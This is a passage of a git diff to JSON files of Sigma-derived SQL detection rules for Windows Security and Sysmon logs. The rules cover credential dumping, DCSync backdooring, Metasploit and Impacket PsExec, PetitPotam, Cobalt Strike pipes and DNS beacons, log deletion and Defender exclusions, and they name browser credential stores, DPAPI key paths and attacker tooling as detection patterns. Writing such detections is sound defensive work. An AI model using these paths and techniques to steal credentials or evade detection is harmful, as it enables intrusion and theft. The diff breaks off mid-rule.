"Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "If source account name is not an admin then its super suspicious" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "File Deleted Via Sysinternals SDelete", - "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", "status": "test", - "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitime usage of SDelete" + "Linux hostnames composed of 16 characters." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "Backup Files Deleted", - "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", - "author": "frack113", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Legitime usage" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_delete_win_delete_backup_file.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "PowerShell Console History Logs Deleted", - "id": "ff301988-c231-4bd0-834c-ac9d73b86586", + "title": "Access Token Abuse", + "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "status": "experimental", - "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "author": "Michaela Adams, Zach Mathis", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.privilege_escalation", + "attack.t1134.001" ], "falsepositives": [ - "Unknown" + "Anti-Virus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_powershell_command_history.yml" + "filename": "win_security_access_token_abuse.yml" }, { - "title": "IIS WebServer Access Logs Deleted", - "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "During uninstallation of the IIS service", - "During log rotation" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_delete_win_delete_iis_access_logs.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Tomcat WebServer Logs Deleted", - "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "During uninstallation of the tomcat server", - "During log rotation" + "Unknown. Feedback welcomed." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_delete_tomcat_logs.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "EventLog EVTX File Deleted", - "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_event_log_files.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", - "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1562.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" - ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" - }, - { - "title": "Suspicious Access To Browser Credential Files", - "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "author": "frack113", - "tags": [ - "attack.t1003", - "attack.credential_access" - ], - "falsepositives": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\') OR (FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR (NewProcessName = 'System' AND ParentProcessName = 'Idle')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_access_win_browser_credential_stealing.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Suspicious Access To Windows Credential History File", - "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Azure AD Health Service Agents Registry Keys Access", + "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "status": "test", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_access_win_susp_cred_hist_access.yml" + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" }, { - "title": "Credential Manager Access", - "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", "tags": [ - "attack.t1003", - "attack.credential_access" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" ], - "filename": "file_access_win_credential_manager_stealing.yml" + "filename": "win_security_account_backdoor_dcsync_rights.yml" }, { - "title": "Suspicious Access To Windows DPAPI Master Keys", - "id": "46612ae6-86be-4802-bc07-39b59feb1309", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_access_win_dpapi_master_key_access.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/rules/rules_windows_sysmon.json b/rules/rules_windows_sysmon.json index d099ae7..66d3986 100644 --- a/rules/rules_windows_sysmon.json +++ b/rules/rules_windows_sysmon.json @@ -1,2636 +1,2602 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP 